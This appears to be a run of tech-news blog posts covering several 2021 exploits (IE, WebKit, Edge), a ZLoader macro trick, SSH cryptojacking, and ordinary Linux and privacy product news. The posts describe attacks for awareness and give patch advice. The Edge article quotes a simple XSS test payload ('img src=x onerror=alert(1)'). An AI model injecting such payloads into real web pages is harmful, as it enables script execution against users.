Internet Explorer, the erstwhile Microsoft browser was recently exploited by hackers to deliver a VBA-based remote access Trojan (RAT) with capabilities of accessing and downloading files stored in targeted Windows systems, including the execution of malicious payloads.

According to researchers at Malwarebytes Labs, a suspicious document named “Манифест.docx” (“Manifest.docx”) was discovered that downloads and executes two templates, with one that is macro-enabled and the other, an html object containing an Internet Explorer exploit.

Both techniques rely on template injection leveraging the IE exploit (CVE-2021-26411) previously used by the Lazarus APT to drop a full-featured Remote Access Trojan.

How Hackers Exploited IE Bug to Deploy VBA Malware on Targeted Windows systems?



The unidentified hackers rely on template injection leveraging the IE exploit, with the remote template embedded in settings.xml.rels containing a full featured VBA Rat that performs the following actions: ability to collect victim’s information, executes shell-codes and ability to read disk and file systems information.



The shell-code once executed deploys the same VBA Rat loaded using remote template injection, and the malicious document loads a decoy document in Russian language after loading the remote templates. The malicious document is purported to be a statement from a group within Crimea opposition to Russia.

And the remote template contains Document_Open and Document_Close which are activated upon opening and closing the document. Interestingly, the VBA RAT is capable of identifying antivirus products running on the target system and execute commands from the attacker-controlled server.

How to Mitigate against the Microsoft IE Bug?



Microsoft had promptly released a patch for the IE Bug as part of its Patch Tuesday updates for March, and users are advised o update their browser in order to mitigate the exploit.

Among the security issues addressed with the update are a clutch of flaws known as ProxyLogon (CVE-2021-26855, 2021-26857, CVE-2021-26858, and CVE-2021-27065) which allowed attackers to break into Microsoft Exchange Servers and subsequently, install unauthorized web-based backdoors for long-term access.

Microsoft IE Bug exploited by Hackers to deploy VBA Malware

Package Hunter is a free and open-source tool by GitLab that scans for malicious code, and monitors for unexpected behavior in the dependencies, which it installs in a sandbox environment to detect any anomalies.

While these packages are supposed to be thoroughly vetted before being included in a program, but this is certainly not feasible in practice due to the sheer number of dependency code needing review and the lack of existing tools to help with dependency code vetting.

Now, GitLab's Package Hunter is perhaps an important addition that could help in securing every software package, as threat actors are increasingly using public package registries as a distribution channel for their malicious code.

How GitLab’s Package Hunter Will Detect Malicious Code?



Package Hunter analyzes a program's dependencies for malicious code, with suspicious system calls reported to the developer for further examination.



It integrates seamlessly with GitLab and Package Hunter has been in use internally to test GitLab's dependencies since November 2020; currently, it supports testing NodeJS modules and Ruby Gems. The aim is to enable other projects to easily detect malicious code in their dependencies before any harm could be caused, which increases users' confidence in open source supply chains.

And it makes it possible for developers to quickly build apps, as this facilitates the reuse of code to achieve the task faster, with the “trust” that the dependencies doesn't need separate review.

How to get started with GitLab's Package Hunter?



Package Hunter is currently available as a free and open-source project on GitLab, and if you wish to get started, use the GitLab CI template to add a job to your project and follow the instructions for setting up a Package Hunter server.

Kindly note that Package Hunter currently supports testing of NodeJS modules and Ruby Gems, you can refer to the official documentations for more technical details.

GitLab Package Hunter detects Malicious code in dependency package

DuckDuckGo’s email protection feature allow users to create an alias email that helps to block creepy email trackers that come with email messaging.

While DuckDuckGo emphasizes on protecting web searchers' privacy and avoiding the filter bubble of personalized search results, it distinguishes itself from other search engines by not profiling users and displaying the same search results to all users for a given search query.

Now, its foray into email protection means that the same privacy standard is coming to the email system and it affords users addresses belonging to the unique domain, duck.com, owned by DuckDuckGo itself, for instance you can get an address like xyz@duck.com.

How DuckDuckGo Email Protection works?



DuckDuckGo Email Protection is launching into beta, as a new feature in its apps that will protect users' email privacy without having them switch email services.



They can generate unique private email addresses in the DuckDuckGo app, and extension which can’t be tracked, with such addresses as name@duck.com email address. And emails sent to it is automatically forwarded to your regular inbox, with no creepy email trackers to worry about. Even DuckDuckGo will never save your email.

If perhaps you use email services like Gmail or Yahoo, the emails sent to your private Duck Address will arrive as usual to your normal inbox so that you can read your email as you normally do, be it in app or on the web.

How to Join the private beta waitlist?



DuckDuckGo Email Protection feature has been released into beta while access to the beta requires that you join the private waitlist.

And the process is simple and straightforward, just Download DuckDuckGo for iOS or Android; Open Settings > Beta Features > Email Protection and Click “Join the Private Waitlist." Once you've got a Personal Duck Address, you can expect DuckDuckGo to support it long-term so you can confidently share it.

DuckDuckGo Email Protection helps to Block Email Trackers

There is an active cryptojacking campaign targeting Linux-based machines running weak SSH credentials, with the attackers goal mainly to deploy the Monero mining malware, albeit their toolbox could allow for other attacks.

According to Bitdefender security researchers who discovered the cryptojacking attacks, it has been active since at least 2020 and the attackers are believed to be a threat group likely based in Romania. The attackers exploited Linux Systems with previously undocumented SSH brute-forcer written in Golang, with their toolset dubbed "Diicot brute" which is a password cracking tool supposed to be available via a software-as-a-service model.

The stealthy part isn't necessarily the brute-forcing of those credentials, but that the hackers does it in a way that lets them go completely undetected.

How the Linux Cryptojacking Attackers target Linux Systems?



While exploitation of weak SSH credentials isn't quite uncommon to Linux Systems, the method employed by the threat group involves obfuscating Bash scripts by compiling them with a shell script compiler (shc) and using Discord to report back the information.



The toolkit used by the threat actors includes traditional tools such as masscan and zmap, and as distributed on an as-a-service model, each threat actor supplies their own API key in their scripts. And like most tools in this kit, the brute force tool has a mix of Romanian and English languages in its interface.

Once the attackers finds a Linux device with inadequate SSH credentials, they'll deploy and execute the loader, as in the current campaign, they employed .93joshua, though they have a couple of others such as .purrple and .black. However, all the loaders are obfuscated via shc and the loader gathers system information and relays to the attacker using an HTTP POST through a Discord webhook.

Albeit, there's no shortage of Linux machines with weak SSH credentials, and the only way to find out is through scanning.

As a mitigation strategy, it is recommended that Linux users should resort to runtime cloud security as an important last line of defense if they detect malicious code injections and other threats that took place after a vulnerability has been exploited by an attacker.

Cryptojacking Campaign targeting Linux Systems on the Rise

Google's Threat intelligence researchers discovered four zero-day exploits used as part of three different campaigns, which vulnerabilities affects the major browsers, including Chrome, Internet Explorer and Apple Safari.

While the WebKit (Safari) zero-day is a Use-After-Free vulnerability in QuickTimePluginReplacement, tracked as CVE-2021-1879, which was discovered on March 19, 2021, and recently exploited by a likely Russian government-backed actors.

The campaign targeting Apple iOS devices also coincided with campaigns from same actor targeting users on Windows devices with the aim to deliver Cobalt Strike, a remote access software designed to execute targeted attacks.

How the Apple WebKit Zero-day was exploited in the wild?



The Apple WebKit Zero-day was exploited in the wild with attackers using LinkedIn Messaging to target officials from Western European countries by specially crafted malicious links.



Once the target victim visits the link from any iOS device, it would redirect to the attacker-controlled domain which served the next stage payloads. And through several validation checks to ensure the iOS device was a real device, the final payload which exploits CVE-2021-1879 would be served to the device.

This exploit turns off Same-Origin-Policy protections to be able to collect authentication cookies from popular websites, such as Google, LinkedIn, Facebook, which it then sends to an attacker-controlled IP via WebSocket. Albeit, not all attacks need chaining multiple zero-day exploits to be successful, the campaign mirrors a wave of targeted attacks carried out by Russian hackers tracked as Nobelium, that was found to abuse the vulnerability to strike Western government agencies.

How to Mitigate against the Apple WebKit Zero-day?



The WebKit flaw could be exploited by adversaries to process maliciously crafted web content to carry out a universal cross-site scripting attack.

However, Apple had promptly patched the flaw on March 26, 2021 with the release of iOS 14.4.2 and iPadOS 14.4.2, therefore users of affected Apple devices should update their devices in order to mitigate the Apple WebKit Zero-day.

Apple WebKit Zero-day actively exploited in the wild

The Solus team has released a new version of Solus 4 ‘Fortitude’ series, Solus 4.3 which follows on the heels of the previous version 4.2 with updates for the software stacks and hardware enablement.

While Solus is an independently developed Linux distribution for the x86-64 architecture featuring the homegrown Budgie desktop environment, GNOME, MATE or KDE Plasma as desktop environment. Solus 4.3 features Linux Kernel 5.13, which brings a huge array of hardware support such as AMD GPU FreeSync/Adaptive-Sync HDMI support and AMD Aldebaran accelerator support.

Along with several bug fixes, Solus 4.3 also offers the most important updates like the upgrade to the Gnome 40 stack (GNOME 40.2) and fixes to Budgie panel applets and tracking of various window state.



What's New in Solus 4.3 Release?



The introduction of Linux Kernel 5.13 boasts of support for M1 powered Apple Macs, and also, preliminary support for Alder Lake-S GPUs; coupled with the hugely improved RISC-V support, RISC-V been a fully open-source CPU architecture, that serves as free alternative to the proprietary arm chips used in smartphones.

Solus 4.3 offers these other improvements:

  • Basic Apple M1 Support
  • Preliminary Alder Lake S GPU Support
  • AMD GPU FreeSync/Adaptive-Sync HDMI support
  • AMD Aldebaran accelerator support
  • New Generic USB display driver
  • Much better RISC-V support


Additionally, Solus 4.3 has all the latest apps including Firefox 89.0.2, LibreOffice 7.1.4.2 and Thunderbird 78.11.0. And the flagship edition, Budgie, haven been upgraded to Budgie 10.5.3, also received lots of improvements.

How to Download or Upgrade to Solus 4.3



For existing Solus users, you'll automatically receive the latest update and then, you can simply update your system.

And if you're new to Solus and want to try out the latest version Solus 4.3, you can download the ISO image from their official download page.

Solus 4.3 Release: brings new Kernel and improved Hardware support

Macro malware was common some years ago as a result of macros running automatically when a document is opened, however, malware authors now have to convince target victims to turn on macros so that their malware can run.

Malware authors are increasingly devising new tricks using non-malicious documents to disable macro security warnings prior to executing code to infect computers. According to researchers at McAfee Labs, there is a novel tactic used by hackers that "downloads and executes malicious DLLs (ZLoader) without any malicious code present in the initial spammed attachment macro."

The researchers discovered that ZLoader infections which propagated using this mechanism was started with phishing email that contains a Microsoft Word document attachment, that if opened, downloads a password-protected Microsoft Excel file from a remote server.

How Hackers uses the New Trick to Disable Macro Warnings in Malicious Office Files?



ZLoader infections primarily targeted victims in the U.S., Canada, Japan, and Spain, and was a descendant of the infamous banking trojan, ZeuS, that is known for aggressively employing macro-enabled Office documents as initial attack vector to steal personally identifiable information from users of financial institutions.



After downloading the XLS file, it reads the cell contents from the XLS and creates a new macro for the same XLS file and writes the cell contents to XLS VBA macros as functions, and once the macros are written and ready, the Word document sets the policy in the registry to 'Disable Excel Macro Warning' which invokes the malicious macro function from the Excel file.



While macros are needed to be enabled in the Word document to trigger the download itself, but simply turning off the security warning, the attackers were able to stay undetected, and the obfuscation techniques used by these attackers have been evolving over the years.

Interestingly, the malware did not only lure users into enabling macros, but also have embedded files containing XLM macros which download and execute malicious second-stage payload that is retrieved from a remote server.

New Evasive Trick used by attackers to disable Macro Security Warnings

KaOS is a Linux distribution with specific focus on Qt and KDE, offering better flexibility and usability, with the latest update KaOS 2021.06 having packages such as the new Plasma 5.22 with Adaptive Transparency.

While the new Plasma 5.22 Adaptive Transparency feature means that the panel widgets will be translucent, and if there are any maximized windows, it will be entirely opaque.

The latest KaOS version also offers other new functionalities, such as support for JPEG XL, an upgrade to the JPEG format, and Plasma Wayland session now supports Activities, allowing users to keep their main work separate from other tasks.

What's New in KaOS 2021.06 Release?



Besides the desktop environment upgrade, KaOS 2021.06 comes with LibreOffice, replacing Calligra as the default office suite. And the latest Plasma packages are built on Qt 5.15.2+, including Plasma 5.22.2, Frameworks 5.83.0 and KDE applications 21.04.2.



Other new and updated core tools in KaOS 2021.06 includes:

  • KWin Wayland now supports Present Windows effect
  • Maliit virtual keyboard packages now Added
  • Fosshost is now the default mirror, utilizes Fastly CDN to deliver content
  • Calamares installer now offers two new QML modules
  • KSysguard replaces Plasma System Monitor


Further more, there is no need to adjust a mirror list to install/update to KaOS anymore, with Fosshost as the default mirror.

How to Download or Upgrade to KaOS 2021.06 Release?



For existing KaOS user, simply use the following command to upgrade your current system to KaOS 2021.06:

sudo pacman -Syu


And for a fresh installation, you can download the ISO images from the official site, but note that the welcome screen can now display text or other info as a QML file in the Calamares window.

KaOS 2021.06 Release: Brings Plasma 5.22 with Adaptive Transparency

Microsoft Edge has a security flaw, which stems from the universal cross-site scripting (UXSS) triggered when translating web pages via Microsoft Translator, the browser's built-in feature.

While UXSS is an attack that exploits client-side vulnerabilities in a browser or browser extensions to generate an XSS condition to execute malicious code; the Edge flaw tracked as CVE-2021-34506 has CVSS score of 5.4 and the discovery credited to Ignacio Laurence, Vansh Devgan and Shivam Kumar Singh of CyberXplore.

Microsoft, however, has already rolled out updates for the Edge browser with fixes for the issue and subsequently awarded the researchers $20,000 as part of its bug bounty program.

How the Edge Browser Flaw Could have allowed anyone to Steal Your Private Data?



Microsoft Translator Which comes pre-installed on Edge browser has a vulnerable code which takes any html tags having an “>img tag without sanitising the input or converting payload to text while translating so that internal translator was taking “>img src=x onerror=alert(1)> payload and executing it as JavaScript as no proper validation check which does sanitization or convert DOM into text and then process it for translation.



As the translation feature failed to sanitize input, it could allow an attacker to insert malicious JavaScript code in any web page and subsequently execute it if the user clicks on the prompt in the address bar to translate the page.

Also, web based applications on Windows store may be vulnerable to this kind of attack as Windows stores ships apps with Microsoft Translator which was responsible for triggering the Universal XSS (UXSS) attack.

What Edge Browser users Need to do Right away



Microsoft has fixed the issue with the latest Edge update, version 91.0.864.59 now available for download.

Therefore, it is recommended that Edge users should promptly update their browser by going to Settings and more > About Microsoft Edge (edge://settings/help) to initiate the update, if not done automatically.

Edge Browser flaw exposes users Personal Data to any website